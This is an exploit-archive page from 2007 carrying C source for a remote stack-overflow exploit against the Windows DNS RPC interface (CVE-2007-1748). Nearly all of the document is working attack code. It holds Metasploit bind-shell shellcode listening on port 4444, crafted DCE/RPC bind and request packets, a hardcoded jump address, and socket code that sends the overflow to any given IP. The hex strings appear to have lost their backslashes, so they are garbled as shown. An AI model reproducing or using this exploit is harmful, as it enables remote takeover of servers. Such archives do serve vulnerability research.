[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MS Windows DNS DnssrvQuery Remote Stack Overflow Exploit
# Published : 2007-04-15
# Author : devcode
# Previous Title : XAMPP for Windows <= 1.6.0a mssql_connect() Remote BoF Exploit
# Next Title : IE NCTAudioFile2.AudioFile ActiveX Remote Overflow Exploit
/*
* Copyright (c) 2007 devcode
*
*
* ^^ D E V C O D E ^^
*
* Windows DNS DnssrvQuery() Stack Overflow
* [CVE-2007-1748]
*
*
* Description:
* A vulnerability has been reported in Microsoft Windows, which can
* be exploited by malicious people to compromise a vulnerable system.
* The vulnerability is caused due to a boundary error in an RPC interface
* of the DNS service used for remote management of the service. This can
* be exploited to cause a stack-based buffer overflow via a specially
* crafted RPC request. The DnssrvQuery function is vulnerable to this stack
* overflow.
*
*
* Hotfix/Patch:
* None as of this time.
*
* Vulnerable systems:
* Microsoft Windows 2000 Advanced Server
* Microsoft Windows 2000 Datacenter Server
* Microsoft Windows 2000 Server
* Microsoft Windows Server 2003 Datacenter Edition
* Microsoft Windows Server 2003 Enterprise Edition
* Microsoft Windows Server 2003 Standard Edition
* Microsoft Windows Server 2003 Web Edition
* Microsoft Windows Storage Server 2003
*
* Tested on:
* Microsoft Windows 2000 Advanced Server
*
* This is a PoC and was created for educational purposes only. The
* author is not held responsible if this PoC does not work or is
* used for any other purposes than the one stated above.
*
* Notes:
* <3 Metasploit for releasing it yesterday, only had time to look at it
* this morning. Also props to Winny Thomas.
*
* There are two ways we can embed shellcode. One is to pad each byte of
* the shellcode with '' and jmp EBX. The other way is the one Winny used
* which is to pass in the shellcode as the third argument in the rpc function
* and jmp EDX after incrementing it appropriately. I used the latter :)
*
* ^^ #pen15, InTeL, D-oNe and ps. St0n3y is nub kthxbye
*
*
*/
#include <iostream>
#include <windows.h>
#pragma comment( lib, "ws2_32" )
/* win32_bind - EXITFUNC=thread LPORT=4444 Size=342 Encoder=PexFnstenvMov
http://metasploit.com */
unsigned char uszShellcode[] =
"x6ax50x59xd9xeexd9x74x24xf4x5bx81x73x13x76xd2xab"
"x1fx83xebxfcxe2xf4x8axb8x40x52x9ex2bx54xe0x89xb2"
"x20x73x52xf6x20x5ax4ax59xd7x1ax0exd3x44x94x39xca"
"x20x40x56xd3x40x56xfdxe6x20x1ex98xe3x6bx86xdax56"
"x6bx6bx71x13x61x12x77x10x40xebx4dx86x8fx37x03x37"
"x20x40x52xd3x40x79xfdxdexe0x94x29xcexaaxf4x75xfe"
"x20x96x1axf6xb7x7exb5xe3x70x7bxfdx91x9bx94x36xde"
"x20x6fx6ax7fx20x5fx7ex8cxc3x91x38xdcx47x4fx89x04"
"xcdx4cx10xbax98x2dx1exa5xd8x2dx29x86x54xcfx1ex19"
"x46xe3x4dx82x54xc9x29x5bx4ex79xf7x3fxa3x1dx23xb8"
"xa9xe0xa6xbax72x16x83x7fxfcxe0xa0x81xf8x4cx25x81"
"xe8x4cx35x81x54xcfx10xbaxbax43x10x81x22xfexe3xba"
"x0fx05x06x15xfcxe0xa0xb8xbbx4ex23x2dx7bx77xd2x7f"
"x85xf6x21x2dx7dx4cx23x2dx7bx77x93x9bx2dx56x21x2d"
"x7dx4fx22x86xfexe0xa6x41xc3xf8x0fx14xd2x48x89x04"
"xfexe0xa6xb4xc1x7bx10xbaxc8x72xffx37xc1x4fx2fxfb"
"x67x96x91xb8xefx96x94xe3x6bxecxdcx2cxe9x32x88x90"
"x87x8cxfbxa8x93xb4xddx79xc3x6dx88x61xbdxe0x03x96"
"x54xc9x2dx85xf9x4ex27x83xc1x1ex27x83xfex4ex89x02"
"xc3xb2xafxd7x65x4cx89x04xc1xe0x89xe5x54xcfxfdx85"
"x57x9cxb2xb6x54xc9x24x2dx7bx77x99x1cx4bx7fx25x2d"
"x7dxe0xa6xd2xabx1fx00";
/* 50abc2a4-574d-40b3-9d66-ee4fd5fba076 v5.0 */
unsigned char uszDceBind[] =
"x05x00x0Bx03x10x00x00x00x48x00x00x00x01x00x00x00"
"xD0x16xD0x16x00x00x00x00x01x00x00x00x00x00x01x00"
"xA4xC2xABx50x4Dx57xB3x40x9Dx66xEEx4FxD5xFBxA0x76"
"x05x00x00x00x04x5Dx88x8AxEBx1CxC9x11x9FxE8x08x00"
"x2Bx10x48x60x02x00x00x00";
/* DnssrvQuery: opnum 1 */
unsigned char uszDceCall[] =
"x05x00x00x83x10x00x00x00x7fx06x00x00x01x00x00x00"
"x57x06x00x00x00x00x01x00xa4xc2xabx50x4dx57xb3x40"
"x9dx66xeex4fxd5xfbxa0x76x10xc2x40x00x02x00x00x00"
"x00x00x00x00x02x00x00x00x44x00x00x00x94xfax13x00"
"xccx04x00x00x00x00x00x00xccx04x00x00";
unsigned char uszDceEnd1[] =
"x41x00xb8xc0x40x00x57x01x00x00x00x00x00x00x57x01"
"x00x00";
unsigned char uszJmps[] =
/* 0x77E14C29 - jmp esp user32.dll (Windows 2000 Advanced Server SP4) */
"x5Cx29x5Cx4Cx5CxE1x5Cx77"
/* inc edx, jmp edx */
"x5Cx42x5Cx42x5Cx42x5Cx42"
"x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42"
"x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42"
"x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42x5Cx42"
"x5Cx42x5CxFFx5CxE2";
void usage( ) {
printf("nttMicrosoft Windows DNS RPC Stack Overflown"
"ttt(c) 2007 devcodenn"
"usage: dns.exe <ip> <port>n");
}
int main( int argc, char **argv ) {
WSADATA wsaData;
SOCKET sConnect;
SOCKADDR_IN sockAddr;
char szRecvBuf[4096];
unsigned char uszPacket[1663];
int nRet;
if ( argc < 3 ) {
usage( );
return -1;
}
if ( WSAStartup( MAKEWORD( 2, 0 ), &wsaData ) != NO_ERROR ) {
printf("[-] Unable to startup winsockn");
return -1;
}
sConnect = socket( AF_INET, SOCK_STREAM, IPPROTO_TCP );
if ( sConnect == INVALID_SOCKET ) {
printf("[-] Invalid socketn");
return -1;
}
sockAddr.sin_family = AF_INET;
sockAddr.sin_addr.s_addr = inet_addr( argv[1] );
sockAddr.sin_port = htons( atoi( argv[2] ) );
printf("[+] Connecting to %s:%sn", argv[1], argv[2] );
nRet = connect( sConnect, (SOCKADDR *)&sockAddr, sizeof( sockAddr ) );
if ( nRet == SOCKET_ERROR ) {
closesocket( sConnect );
printf("[-] Cannot connect to servern");
return -1;
}
printf("[+] Sending DCE Bind packet...n");
nRet = send( sConnect, (const char *)uszDceBind, sizeof( uszDceBind ) - 1, 0 );
if ( nRet == SOCKET_ERROR ) {
closesocket( sConnect );
printf("[-] Cannot sendn");
return -1;
}
nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 );
if ( nRet <= 0 ) {
closesocket( sConnect );
printf("[-] Recv failedn");
return -1;
}
memset( uszPacket, 0x5C, sizeof( uszPacket ) );
memcpy( uszPacket, uszDceCall, sizeof( uszDceCall ) - 1 );
memcpy( uszPacket + 1006, uszJmps, sizeof( uszJmps ) - 1 );
memcpy( uszPacket + 1302, uszDceEnd1, sizeof( uszDceEnd1 ) );
memcpy( uszPacket + 1320, uszShellcode, sizeof( uszShellcode ) );
printf("[+] Sending DCE Request packet...n");
nRet = send( sConnect, (const char *)uszPacket, sizeof( uszPacket ), 0 );
if ( nRet == SOCKET_ERROR ) {
closesocket( sConnect );
printf("[-] Cannot sendn");
return -1;
}
printf("[+] Check shell on port 4444 :)n");
nRet = recv( sConnect, szRecvBuf, sizeof( szRecvBuf ), 0 );
closesocket( sConnect );
return 0;
}
// www.Syue.com [2007-04-15]